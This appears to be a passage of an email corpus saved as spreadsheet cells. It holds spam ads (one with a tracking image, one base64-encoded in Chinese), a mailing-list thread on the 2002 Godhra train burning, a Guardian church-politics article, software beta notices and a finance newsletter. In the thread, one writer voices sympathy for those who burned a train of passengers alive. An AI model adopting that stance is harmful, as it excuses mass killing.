   &lt;TR&gt;
     &lt;TD&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=QBFUIEXORXKL&amp;ext=1"&gt;&lt;IMG border=0 height=50
       src="http://168.143.181.42/htmlemails/images/T193no_option_04.gif"
       width=150&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=QBFUIEXORXKL&amp;ext=1"&gt;&lt;IMG border=0 height=66
       src="http://168.143.181.42/htmlemails/images/T193no_option_05.gif"
       width=185&gt;&lt;/A&gt;&lt;/TD&gt;
     &lt;TD colSpan=2&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=QBFUIEXORXKL&amp;ext=1"&gt;&lt;IMG border=0 height=66
       src="http://168.143.181.42/htmlemails/images/T193no_option_06.gif"
       width=115&gt;&lt;/A&gt;&lt;/TD&gt;
     &lt;TD&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=QBFUIEXORXKL&amp;ext=1"&gt;&lt;IMG border=0 height=66
       src="http://168.143.181.42/htmlemails/images/T193no_option_07.gif"
       width=150&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD rowSpan=2&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=QBFUIEXORXKL&amp;ext=1"&gt;&lt;IMG border=0
       height=154
       src="http://168.143.181.42/htmlemails/images/T193no_option_08.gif"
       width=185&gt;&lt;/A&gt;&lt;/TD&gt;
     &lt;TD colSpan=2&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=QBFUIEXORXKL&amp;ext=1"&gt;&lt;IMG border=0 height=72
       src="http://168.143.181.42/htmlemails/images/T193no_option_09.gif"
       width=115&gt;&lt;/A&gt;&lt;/TD&gt;
     &lt;TD&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=QBFUIEXORXKL&amp;ext=1"&gt;&lt;IMG border=0 height=72
       src="http://168.143.181.42/htmlemails/images/T193no_option_10.gif"
       width=150&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD colSpan=2&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=QBFUIEXORXKL&amp;ext=1"&gt;&lt;IMG border=0 height=82
       src="http://168.143.181.42/htmlemails/images/T193no_option_11.gif"
       width=115&gt;&lt;/A&gt;&lt;/TD&gt;
     &lt;TD&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=QBFUIEXORXKL&amp;ext=1"&gt;&lt;IMG border=0 height=82
       src="http://168.143.181.42/htmlemails/images/T193no_option_12.gif"
       width=150&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=QBFUIEXORXKL&amp;ext=1"&gt;&lt;IMG border=0 height=80
       src="http://168.143.181.42/htmlemails/images/T193no_option_13.gif"
       width=185&gt;&lt;/A&gt;&lt;/TD&gt;
     &lt;TD colSpan=3&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=QBFUIEXORXKL&amp;ext=1"&gt;&lt;IMG border=0 height=80
       src="http://168.143.181.42/htmlemails/images/T193no_option_14.gif"
       width=265&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;TABLE align="center" width=450&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD vAlign=top&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=QBFUIEXORXKL&amp;ext=1"&gt;&lt;IMG
       alt=SimplyWireless.com border=0 height=59 hspace=10
       src="http://168.143.181.42/htmlemails/images/swdotcomlogo1.gif"
       width=200&gt;&lt;/A&gt;&lt;/TD&gt;
     &lt;TD align=left vAlign=top width=273&gt;&lt;FONT face=Arial size=-3&gt;*Free phone
       offer subject to VoiceStream Wireless credit approval. Must activate a new
       line of service to receive a free phone. A one-time activation fee of $25
       applies to all new activations. Coverage not available in all areas. Offer
       fulfilled by SimplyWireless.com, a VoiceStream authorized dealer. See site
       for additional offer details.
       &lt;P&gt;&lt;/P&gt;**$50 mail-in rebate is available for new VoiceStream service plans
       $29.99 and greater. Rebate ends
 8/31/02.&lt;/FONT&gt;&lt;/TD&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;img src="http://admanmail.com/server/t.asp?ad_key=QBFUIEXORXKL"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</si>
  <si>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First, it was my understanding that they had the food before they
 refused to pay.  I often have the goods in my possession before I settle
 the paycheck.
 Second, 'not being paid for a little food' is an awfully big deal in
 India.  It isn't far from stealing the only food my children have so
 I'll have to watch them starve.  The margin of survival is very, very,
 thin.
 So yes.  In my particular reality distortion field 'not paying for a
 little food' in India is akin to a direct act of violence intended to
 cause suffering if not death on the victims family.  That such an act
 triggers a violent response is, IMHO, hardly surprising.
 In other words, as far as I could tell the people on the train fired the
 first shot.
 With all of that said I still don't know if this happened or not.  Nor
 do I know for sure that the margin of survival for those Muslim vendors
 was that thin.
 &gt; -----Original Message-----
 &gt; From: Stephen D. Williams [mailto:swilliams@hpti.com]
 &gt; Sent: Monday, September 16, 2002 11:54 AM
 &gt; To: johnhall@evergo.net
 &gt; Cc: fork@spamassassin.taint.org; lea@lig.net
 &gt; Subject: Re: Slaughter in the Name of God
 &gt; 
 &gt; Wow!  It seems you are evaluating this with a large reality distortion
 &gt; field.
 &gt; 
 &gt; If the activists on the train refused to pay for food, then the
 vendors
 &gt; shouldn't give it to them.  And the local police force should be
 &gt; arresting them.  Etc.
 &gt; 
 &gt; You have to be operating from a particularly primitive point of view,
 &gt; which obviously was in operation with the participants here, to think
 &gt; that religious differences or not being paid for a little food (or
 &gt; taunting!) was even a remote justification for burning a train full of
 &gt; people alive.
 &gt; 
 &gt; sdw
 &gt; 
 &gt; John Hall wrote:
 &gt; &gt; What I understood was that the activists on the train refused to pay
 for
 &gt; &gt; the food and other items they acquired from the Muslim vendors --
 then
 &gt; &gt; taunted them.
 &gt; &gt;
 &gt; &gt; That may not be true, but it would put things in a more interesting
 &gt; &gt; light.  Taking food from a small vendor in India and not paying them
 is
 &gt; &gt; trying to starve them.
 &gt; &gt;
 &gt; &gt; It sounded consistent with the ideas and purpose of the train full
 of
 &gt; &gt; activists.
 &gt; &gt;
 &gt; &gt; I'm rarely an apologist for Muslims anywhere.  Yet I find my
 sympathies
 &gt; &gt; with the Muslims in this case, even after they burned the train.
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;&gt;From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 &gt; &gt;&gt;Stephen D. Williams
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;&gt;The pity of it is that some
 &gt; &gt;&gt;Muslims were ready to give it to them. Their murderous attack on the
 &gt; &gt;&gt;train-load of VHP activists at Godhra (with its awful, atavistic
 &gt; &gt;
 &gt; &gt; echoes
 &gt; &gt;
 &gt; &gt;&gt;of the killings of Hindus and Muslims by the train-load during the
 &gt; &gt;&gt;partition riots of 1947) played right into the Hindu extremists'
 &gt; &gt;
 &gt; &gt; hands.
 &gt; 
 &gt; sdw
 &gt; --
 &gt; swilliams@hpti.com http://www.hpti.com
 &gt; Stephen D. Williams, Senior Technical Director
 &gt; 
 &gt; 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: MySQL 4.1 Source Tree Available
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000226.html
 Date: 2002-10-07T14:07:06-08:00
 If you like to live on the bleeding edge and play with code that's not yet 
 ready for prime-time, good news! You can now get the MySQL 4.1 source tree. The 
 only real difference from the 3.23 and 4.0 trees...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Bashing the bishop
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.guardian.co.uk/religion/Story/0,2763,806744,00.html
 Evangelicals' threat to new archbishop
 Direct action threat over liberal views on sexuality
 Stephen Bates, religious affairs correspondent
 Tuesday October 8, 2002
 The Guardian
 Evangelical fundamentalists last night stepped up their campaign to oust
 Rowan Williams, the incoming Archbishop of Canterbury, before he even takes
 up his post, by threatening to take "direct action" against him.
 The council of the Church Society, the Church of England's oldest
 evangelical body, joined a younger evangelical pressure group called Reform,
 which is also opposed to Dr Williams, in calling on him to recant his
 supposedly liberal views on sexuality or stand down.
 Following an emergency meeting, the 167-year-old society, whose leaders met
 the archbishop last week, proclaimed their continued opposition to his
 appointment and called on all Anglicans to spurn him.
 The move is the latest stage of an increasingly aggressive attempt to
 destabilise the new archbishop, whose leftwing political views are regarded
 with deep suspicion by the conservative fringes of the evangelical movement.
 Some evangelicals object to Dr Williams's acknowledgement that he has
 ordained a gay priest, something many bishops have done, and that those who
 have sex outside marriage need not necessarily be spurned. The new
 archbishop has repeatedly assured them that he respects the canons of the
 church.
 Nevertheless, the society said: "It is clear that he prefers his private
 judgment to the voice of scripture, to the voice of tradition and to the
 common mind of the church. As such he can only be a focus of disunity.
 "The council... called upon loyal Anglicans to pray specifically that Rowan
 Williams would see the error in his teaching, change his views or stand
 down," it said.
 The society claimed to have drawn up an "action plan," including calling on
 bishops and primates of the 70 million worldwide Anglican communion, of
 which archbishops of Canterbury are the leaders, to distance themselves from
 Dr Williams's doctrinal and ethical position. It promised it would be
 "taking steps towards appropriate direct action".
 It added that Dr Williams remained on the editorial board of a journal
 called Theology and Sexuality which, six months ago, published articles
 allegedly commending homosexual behaviour.
 Despite its claim, the society does not represent the common mind of the
 church. Dr Williams, currently Archbishop of Wales, was chosen by the crown
 appointments commission of church members, including evangelicals, and his
 appointment was endorsed by the prime minister and the Queen.
 He is due to succeed George Carey, who retires this month, and will be
 formally enthroned at Canterbury cathedral in February.
 Asked what form direct action might take, the Rev George Curry, the
 society's chairman, said: "Watch this space." Presumably it could involve a
 small minority of parishes repudiating the new archbishop and seeking
 alternative oversight or even demonstrations at services where Dr Williams
 is present.
 Church of England bishops, who have hitherto largely kept their heads down
 during the row, are meeting next week to discuss their response to the
 evangelical extremists' challenge, which appears to have grown in the
 absence of a robust rebuttal.
 A letter by senior theologians in today's Guardian, however, repudiates the
 evangelicals' tactics, calling them unseemly and contrary to biblical
 teaching.
 On the BBC's Thought for the Day yesterday, Angela Tilby, vice-principal of
 Westcott House, Cambridge, accused Dr Williams's opponents of presumption
 and blackmail. "It is in fact a thoroughly aggressive way to behave. It is
 attempting to force an issue by emotional violence... manipulating to get
 your way is often preferable to painstaking negotiation," she said.
 Last week, Dr Williams said he was deeply saddened. "Matters of sexuality
 should not have the priority or centrality that Reform and the Church
 Society have tried to give them. The archbishop cannot withdraw his
 appointment since so many, including evangelicals, have urged him to take
 the post... the archbishop believes it to be his duty under God."
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Sell a Home with Ease!
 http://us.click.yahoo.com/SrPZMC/kTmEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: =?big5?Q?=A7A=B7=C7=B3=C6=A6n=A4F=B6=DC=3F?=
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_vXklypZzzDWWhOFZ5e1rZ
 Content-Type: multipart/alternative;
 	boundary="----=_NextPart_vXklypZzzDWWhOFZ5e1rZAA"
 ------=_NextPart_vXklypZzzDWWhOFZ5e1rZAA
 Content-Type: text/html;
 	charset="big5"
 Content-Transfer-Encoding: base64
 PGh0bWw+DQoNCjxoZWFkPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1MYW5ndWFnZSIgY29u
 dGVudD0iemgtdHciPg0KPG1ldGEgbmFtZT0iR0VORVJBVE9SIiBjb250ZW50PSJNaWNyb3NvZnQg
 RnJvbnRQYWdlIDUuMCI+DQo8bWV0YSBuYW1lPSJQcm9nSWQiIGNvbnRlbnQ9IkZyb250UGFnZS5F
 ZGl0b3IuRG9jdW1lbnQiPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50
 PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9YmlnNSI+DQo8dGl0bGU+s2+sT6llsFWl0bFNt368c6dppL2l
 caVOtW+kxaq9sbWmXqtItUyqa7G1pqwgy+c8L3RpdGxlPg0KPC9oZWFkPg0KDQo8Ym9keT4NCg0K
 PHAgc3R5bGU9Im1hcmdpbi10b3A6IDBweDsgbWFyZ2luLWJvdHRvbTogMHB4Ij48Zm9udCBjb2xv
 cj0iIzgwODA4MCI+DQqzb6xPqWWwVaXRsU23frxzp2mkvaVxpU61b6TFqr2xtaZeq0i1TKprsbWm
 rCDL5yB+ICE8L2ZvbnQ+PC9wPg0KPGhyIFNJWkU9IjEiPg0KPGRpdiBhbGlnbj0iY2VudGVyIj4N
 CiAgPGNlbnRlcj4NCiAgPHRhYmxlIHN0eWxlPSJib3JkZXI6IDFweCBkb3R0ZWQgI0ZGMDAwMDsg
 OyBib3JkZXItY29sbGFwc2U6Y29sbGFwc2UiIGhlaWdodD0iMzY1IiBjZWxsU3BhY2luZz0iMCIg
 Y2VsbFBhZGRpbmc9IjAiIHdpZHRoPSI2MDQiIGJvcmRlcj0iMCIgYm9yZGVyY29sb3JsaWdodD0i
 IzAwODAwMCIgYm9yZGVyY29sb3I9IiMxMTExMTEiPg0KICAgIDx0cj4NCiAgICAgIDx0ZCB2QWxp
 Z249ImNlbnRlciIgYWxpZ249Im1pZGRsZSIgd2lkdGg9IjU5OCIgYmdDb2xvcj0iI0ZGRkYwMCIg
 aGVpZ2h0PSIzNjUiPg0KICAgICAgPHAgYWxpZ249ImNlbnRlciI+oUA8L3A+DQogICAgICA8cCBh
 bGlnbj0iY2VudGVyIj48Zm9udCBmYWNlPSK80LeixekiIHNpemU9IjQiIGNvbG9yPSIjMDAwMEZG
 Ij6mbqpCpM2w2iE8L2ZvbnQ+PC9wPg0KICAgICAgPHAgYWxpZ249ImNlbnRlciI+PGZvbnQgZmFj
 ZT0ivNC3osXpIiBzaXplPSI0IiBjb2xvcj0iIzAwMDBGRiI+DQogICAgICCzXKZopEiv4KRPqFOm
 s6Txp0GmbiymXaywtHi0pKRGrsm+9zwvZm9udD48L3A+DQogICAgICA8cCBhbGlnbj0iY2VudGVy
 Ij48Zm9udCBmYWNlPSK80LeixekiIHNpemU9IjQiIGNvbG9yPSIjMDAwMEZGIj6p0qVIpGq1b6dR
 passs9C3fq1QtEksPC9mb250PjwvcD4NCiAgICAgIDxwIGFsaWduPSJjZW50ZXIiPjxmb250IGZh
 Y2U9IrzQt6LF6SIgc2l6ZT0iNCIgY29sb3I9IiMwMDAwRkYiPrNcpmg8L2ZvbnQ+PGZvbnQgZmFj
 ZT0ivNC3osXpIiBjb2xvcj0iI0ZGMDAwMCIgc2l6ZT0iNiI+vve3fDwvZm9udD48Zm9udCBmYWNl
 PSK80LeixekiIHNpemU9IjQiIGNvbG9yPSIjMDAwMEZGIj6lbqr5rsksqbmpuaV1PC9mb250Pjxm
 b250IGZhY2U9IrzQt6LF6SIgY29sb3I9IiNGRjAwRkYiIHNpemU9IjYiPqazM6ztxMEhPC9mb250
 PjwvcD4NCiAgICAgIDxwIGFsaWduPSJjZW50ZXIiPjxmb250IGZhY2U9IrzQt6LF6SIgc2l6ZT0i
 NCIgY29sb3I9IiMwMDAwRkYiPrROpl2ssCZxdW90OzwvZm9udD48Zm9udCBmYWNlPSK80Leixeki
 IGNvbG9yPSIjMDAwMEZGIiBzaXplPSI1Ij6ko6XMpN8mcXVvdDs8L2ZvbnQ+PGZvbnQgZmFjZT0i
 vNC3osXpIiBzaXplPSI0IiBjb2xvcj0iIzAwMDBGRiI+s3m0TrNcpmikSKZis2+4zKaopVw8L2Zv
 bnQ+PC9wPg0KICAgICAgPHAgYWxpZ249ImNlbnRlciI+PGZvbnQgZmFjZT0ivNC3osXpIiBzaXpl
 PSI0IiBjb2xvcj0iIzAwMDBGRiI+s8yxTbd+qrq5zraku7K+ybF6PC9mb250PjwvcD4NCiAgICAg
 IDxwIGFsaWduPSJjZW50ZXIiPjxhIGhyZWY9Imh0dHA6Ly92aWMuaDhoLmNvbS50dy8iPg0KICAg
 ICAgPGZvbnQgc2l6ZT0iNiIgZmFjZT0ivNC3osXpIiBjb2xvcj0iI0ZGMDAwMCI+MrhVpLi26qRA
 rdOkcKbRwfOqurnaPC9mb250PjwvYT48L3A+DQogICAgICA8cCBhbGlnbj0iY2VudGVyIj4yMKTA
 xMGs3cC0s2+t0773t3wsp0G0TqxPptukdqq6pUSkSCGvrLF6pm65QjwvcD4NCiAgICAgIDxwPjxm
 b250IGNvbG9yPSIjZmYwMGZmIj48YSBocmVmPSJodHRwOi8vdmljLmg4aC5jb20udHcvIj4NCiAg
 ICAgIGh0dHA6Ly92aWMuaDhoLmNvbS50dzwvYT48L2ZvbnQ+PHA+PGZvbnQgY29sb3I9IiNGRjAw
 MDAiPg0KICAgICAgPHNwYW4gbGFuZz0iZW4tdXMiPjxmb250IHNpemU9IjciPnBzOjwvZm9udD48
 L3NwYW4+t1G2aaRAqEKqvrlEpnCm86ZirmG7tMNQpc669Lj0wcikar/6LKVpPC9mb250Pjxmb250
 IHNpemU9IjQiIGNvbG9yPSIjMDAwMEZGIj6nS7ZPs/imV7r0uPSvU7BWPC9mb250PjxwPg0KICAg
 ICAgPGZvbnQgY29sb3I9IiNGRjAwMDAiPqZwqkesebZxuUywqqzdpKOo7L11pFe8dqT5LKVpr8Go
 +qdLtk+z0Ld+pfq60DwvZm9udD48Zm9udCBjb2xvcj0iIzAwMDBGRiI+KL3QpmKtuq22r2SkValt
 ple5cbjcpu2nfSk8L2ZvbnQ+PHA+oUA8cD4NCiAgICAgIKFAPHA+oUA8cD6hQDwvdGQ+DQogICAg
 PC90cj4NCiAgPC90YWJsZT4NCiAgPC9jZW50ZXI+DQo8L2Rpdj4NCjxociBTSVpFPSIxIj4NCjxw
 IHN0eWxlPSJtYXJnaW4tdG9wOiAwcHg7IG1hcmdpbi1ib3R0b206IDBweCIgYWxpZ249ImNlbnRl
 ciI+DQo8Zm9udCBjb2xvcj0iI2ZmMDAwMCI+pnCms6W0wlq90KijvcyhQaSjt1GmQaasqOymuatI
 vdCr9iZuYnNwOyAtJmd0OyZuYnNwOyAoPGEgaHJlZj0iaHR0cDovL3gtbWFpbC5oOGguY29tLnR3
 IiB0YXJnZXQ9Il9ibGFuayI+qdqmrLxzp2k8L2E+KTwvZm9udD48L3A+DQoNCjwvYm9keT4NCg0K
 PC9odG1sPg==
 ------=_NextPart_vXklypZzzDWWhOFZ5e1rZAA--
 ------=_NextPart_vXklypZzzDWWhOFZ5e1rZ--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: iSilo announcements (November 8, 2002)
</t>
  </si>
  <si>
    <t xml:space="preserve">----------------------------------------------------------------------
 1. iSilo(TM) 3.25 for Palm OS, Pocket PC, and Windows enters beta1
 2. iSilo(TM) 3.25 for Windows CE Handheld PC enters beta1
 3. iSiloX 3.25 for Windows and Mac OS enters beta1
 4. iSiloXC 3.25 for Windows, Linux, FreeBSD, Mac OS X,
    and Solaris enters beta1
 ----------------------------------------------------------------------
 ======================================================================
 1. iSilo(TM) 3.25 for Palm OS and Pocket PC enters beta1
 ----------------------------------------------------------------------
 iSilo(TM) 3.25b1 addresses the following issues from iSilo 3.2:
 - When highlighting content with a non-zero top margin, the highlight
   may be offset vertically in the downward direction.
 - (iSilo for Palm OS) Tapping the application launcher/home silkscreen
   icon while in the password dialog results in a fatal error.
 - (iSilo for Palm OS) Documents in /Palm/Launcher may fail to be added
   to the document list.
 - (iSilo for Palm OS) Text displays cutoff on the NX60/70V.
 iSilo(TM) 3.25b1 adds the following new features to iSilo 3.2:
 - Added support for hyperlink mode for iterating through currently
   visible hyperlinks.
 - Added support for starting on the home page of a document if the
   document was converted with the option for doing so if the document
   date differs from the document date the last time the document was
   opened.
 - (iSilo for Palm OS) For Palm OS 5, added ability to display an
   image at double the image's width and height.
 - (iSilo for Pocket PC) When renaming files, if the original file
   name had a three letter extension, then add it to the new file name
   if it does not end with a period nor have a three letter extension.
 Please note that this is a beta version of the software, and as
 such is intended for testing purposes to help eliminate problems
 and issues before the release.
 Please report any problems or issues you encounter by sending an
 email to email@iSilo.com.  When reporting problems, please include
 all potentially relevant details, including the exact steps used
 to reproduce the problem, OS version, and hardware configuration.
 To download iSilo(TM) 3.25b1 for Palm OS(R), please go to this URL:
     &lt;http://www.iSilo.com/info/beta/iSiloPalmOS.htm&gt;
 To download iSilo 3.25b1 for Pocket PC, please go to this URL:
     &lt;http://www.iSilo.com/info/beta/iSiloPPC.htm&gt;
 To download iSilo 3.25b1 for Windows , please go to this URL:
     &lt;http://www.iSilo.com/info/beta/iSiloW32.htm&gt;
 ======================================================================
 2. iSilo(TM) 3.25 for Windows CE Handheld PC enters beta1
 ----------------------------------------------------------------------
 iSilo(TM) 3.25 will be the first version of iSilo for Windows CE
 Handheld PC and has the requirements shown here.
 Basic requirements:
 - Windows CE Handheld PC Edition version 3.0, Windows CE Handheld PC
   Professional Edition version 3.0, or Windows CE Handheld PC 2000
 - Storage memory for application executable file (dependent on
   processor): ARM: 579K, MIPS: 627K
 - To determine your processor type go to the Start menu, tap Settings, tap
   Control Panel, double-tap System, and then go to the Device tab.
 - 86K storage memory for supporting documents
 - 512K free program memory (1MB recommended)
 Additional functionality specific requirements:
 - Additional memory required for document storage.
 - iSiloX required for creating documents utilizing maximum document
   presentation capabilities.
 Please note that this is a beta version of the software, and as
 such is intended for testing purposes to help eliminate problems
 and issues before the release.
 Please report any problems or issues you encounter by sending an
 email to email@iSilo.com.  When reporting problems, please include
 all potentially relevant details, including the exact steps used
 to reproduce the problem, OS version, and hardware configuration.
 To download iSilo 3.25b1 for Windows CE Handheld PC, please go
 to this URL:
     &lt;http://www.iSilo.com/info/beta/iSiloHPC.htm&gt;
 ======================================================================
 3. iSiloX 3.25 for Windows and Mac OS enters beta1
 ----------------------------------------------------------------------
 iSiloX 3.25b1 addresses the following issues from iSiloX 3.2:
 - Maximum width and height settings for images would not be applied
   to images referenced by an image tag with a width or height
   attribute specification greater than the native width or height
   of the image.
 - Within a block with a non-zero text indent, a line following a
   forced break with the &lt;br&gt; tag with markup at the beginning
   of the line would incorrectly be indented.
 - If a parent element specifies a font-size using ems, then the
   child element would incorrectly also inherit the specification
   instead of the computed font-size value.  For example, in the
   case where the parent element specified 2em, the actual computed
   value of the child would be 4em (e.g., 2 * 2em = 4em).
 - Upon reopening a .ixl file containing a document entry with the
   receive cookies option on, the option would be reset to off.
 - In a .ixl file, if an element is specified but has no content,
   the .ixl file may fail to open.
 iSiloX 3.25b1 adds the following features to iSiloX 3.2:
 - In the Document properties, added a home page section for specifying
   the document home page number and whether or not to open the
   document on the home page when the document date changes.
 - In the Text properties, for preformatted text, added an option
   for specifying whether or not to use a monospace font.
 - In the Text properties, for preformatted text, added an option
   for specifying whether to keep all single line breaks, remove all
   single line breaks, or only keep single line breaks if a space or
   tab character follows.
 Please note that this is a beta version of the software, and as
 such is intended for testing purposes to help eliminate problems
 and issues before the release.
 Please report any problems or issues you encounter by sending an
 email to email@iSilo.com.  When reporting problems, please include
 all potentially relevant details, including the exact steps used
 to reproduce the problem, OS version, and hardware configuration.
 To download iSiloX 3.25b1 for Windows, please go to this URL:
     &lt;http://www.iSiloX.com/info/beta/iSiloXWindows.htm&gt;
 To download iSiloX 3.25b1 for Mac OS, please go to this URL:
     &lt;http://www.iSiloX.com/info/beta/iSiloXMac.htm&gt;
 ======================================================================
 4. iSiloXC 3.25 for Windows, Linux, FreeBSD, Mac OS X,
    and Solaris enter beta1
 ----------------------------------------------------------------------
 iSiloX 3.25b1 addresses the following issues from iSiloX 3.2:
 - Maximum width and height settings for images would not be applied
   to images referenced by an image tag with a width or height
   attribute specification greater than the native width or height
   of the image.
 - Within a block with a non-zero text indent, a line following a
   forced break with the &lt;br&gt; tag with markup at the beginning
   of the line would incorrectly be indented.
 - If a parent element specifies a font-size using ems, then the
   child element would incorrectly also inherit the specification
   instead of the computed font-size value.  For example, in the
   case where the parent element specified 2em, the actual computed
   value of the child would be 4em (e.g., 2 * 2em = 4em).
 - Upon reopening a .ixl file containing a document entry with the
   receive cookies option on, the option would be reset to off.
 - In a .ixl file, if an element is specified but has no content,
   the .ixl file may fail to open.
 iSiloX 3.25b1 adds the following features to iSiloX 3.2:
 - Under &lt;DocumentOptions&gt;, added the &lt;HomePageNumber&gt; and
   &lt;OpenHomePageOnDateChange&gt; elements for specifying the document
   home page number and whether or not to open the document on the
   home page when the document date changes.
 - Under &lt;DocumentOptions&gt;, added the &lt;PreUseMonospaceFont&gt; element
   for preformatted text for specifying whether or not to use a
   monospace font.
 - Under &lt;DocumentOptions&gt;, added the &lt;PreSingleLineBreaks&gt; element
   for preformatted text for specifying whether to keep all single
   line breaks, remove all single line breaks, or only keep single
   line breaks if a space or tab character follows. See .ixl file
   format for more information.
 Please note that this is a beta version of the software, and as
 such is intended for testing purposes to help eliminate problems
 and issues before the release.
 Please report any problems or issues you encounter by sending an
 email to email@iSilo.com.  When reporting problems, please include
 all potentially relevant details, including the exact steps used
 to reproduce the problem, OS version, and hardware configuration.
 To download iSiloXC 3.25b1 for Windows, please go to this URL:
     &lt;http://www.iSiloX.com/info/beta/iSiloXCWindows.htm&gt;
 To download iSiloXC 3.25b1 for Linux, please go to this URL:
     &lt;http://www.iSiloX.com/info/beta/iSiloXC386.htm&gt;
 To download iSiloXC 3.25b1 for FreeBSD, please go to this URL:
     &lt;http://www.iSiloX.com/info/beta/iSiloXCBSD.htm&gt;
 To download iSiloXC 3.25b1 for Mac OS X, please go to this URL:
     &lt;http://www.iSiloX.com/info/beta/iSiloXCOSX.htm&gt;
 To download iSiloXC 3.25b1 for Solaris, please go to this URL:
     &lt;http://www.iSiloX.com/info/beta/iSiloXCSOL.htm&gt;
 ----------------------------------------------------------------------
 You have received this message because you subscribed to the
 iSilo(TM) mailing list.  If you would like to be removed from
 this list, please send an email with the subject "unsubscribe"
 to: &lt;list@iSilo.com&gt;.
 Please note that this email address only handles subscriptions
 and unsubscriptions of the mailing list.  Any other messages
 sent to this email address are automatically deleted.
 ----------------------------------------------------------------------
 iSilo(TM)             http://www.iSilo.com             email@iSilo.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Personal Finance: Resolutions You Can Keep
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ======================== THE MOTLEY FOOL ========================
                         PERSONAL  FINANCE 
                     Wednesday, January 2, 2002 
 mkettler@home.com
 =================================================================
 IN THIS ISSUE
 - ASK THE FOOL: Stop the Solicitation!
   http://www.fool.com/m.asp?i=562064
 - YOUR MONEY: Resolutions You Can Keep
   http://www.fool.com/m.asp?i=562065
 - SPOTLIGHT: Should All My Savings Be in the Market?
   http://www.fool.com/m.asp?i=562066
 - COMMUNITY TIPS: Do (At Least) One Thing Differently
   http://www.fool.com/m.asp?i=562067
 =================================================================
 SPONSORED BY: Datek
 Datek Online. Built to trade.
 *Proprietary auto routing technology | *$9.99 commission 
 for online equity trades | *60-second execution commitment.
 Apply for a Datek Account Now!
 http://www.lnksrv.com/m.asp?i=562068
 =================================================================
 ASK THE FOOL
 Q. I'M TIRED OF GETTING SO MANY CREDIT CARD OFFERS IN THE MAIL. 
 I ALREADY HAVE 
 A CARD AND I DON'T WANT ANY MORE MAIL OFFERING ME NEW ONES. HOW 
 CAN I STOP IT? 
 A. There are three main credit bureaus in the United States, and 
 they've agreed that if someone contacts one of them and asks to 
 be removed from junk mail (er, "direct mail") lists and 
 telemarketing phone lists, they'll all honor the request. 
 Full Answer:
 http://www.fool.com/m.asp?i=562069
 -----------------------------------------------------------------
 YOUR MONEY 
 RESOLUTIONS YOU CAN KEEP
 Let's face it, New Year's resolutions are mostly nightmares that 
 hang over our heads like that dark cloud that follows Eeyore 
 everywhere he goes. We mostly fail to keep our resolutions 
 because they are too vague and imply guilt-inducing judgment. 1. 
 Live every moment. 2. Be a good person. 3. Lose a lot of weight. 
 No pressure. Right? Wrong. 
 http://www.lnksrv.com/m.asp?i=562070
 Don't despair. We've put together a quick, proactive to-do list 
 that is actually doable. This year's resolution: Save big bucks 
 now and live comfortably in the future. Now that's a resolution 
 you can get behind. Let's get started! 
 1. DIAL AWAY YOUR DEBT 
 It's true. You can lower your credit card interest rates with 
 one phone call.
 http://www.fool.com/m.asp?i=562071 
 2. GET MORE FROM YOUR SAVINGS
 Don't stash your short-term cash savings under your mattress. 
 Earn higher yields on CDs, money markets, and more. 
 http://www.fool.com/m.asp?i=562072
 3. INVEST FOR LESS 
 Make sure your broker isn't charging you too much. Compare rates 
 and hire a new one in only 60 seconds. 
 http://www.fool.com/m.asp?i=562073
 4. RETIRE EARLY
 Thanks to recent tax law changes, you can start pitching in more 
 to your retirement accounts.
 http://www.fool.com/m.asp?i=562074
 5. REFINANCE AND SAVE 
 When interest rates drop, some homeowners have the opportunity 
 to save big money.
 http://www.fool.com/m.asp?i=562075
 If this list seems too daunting, and you don't want to go it 
 alone, you can get some unbiased, professional advice about your 
 finances with TMF Money Advisor. In fact, we're so excited about 
 this service, we are offering a free one-month trial 
 subscription. For more information, go here. 
 http://www.fool.com/m.asp?i=562076
 For more money-saving tips to aid your journey to Financial 
 Independence, visit our Personal Finance area. 
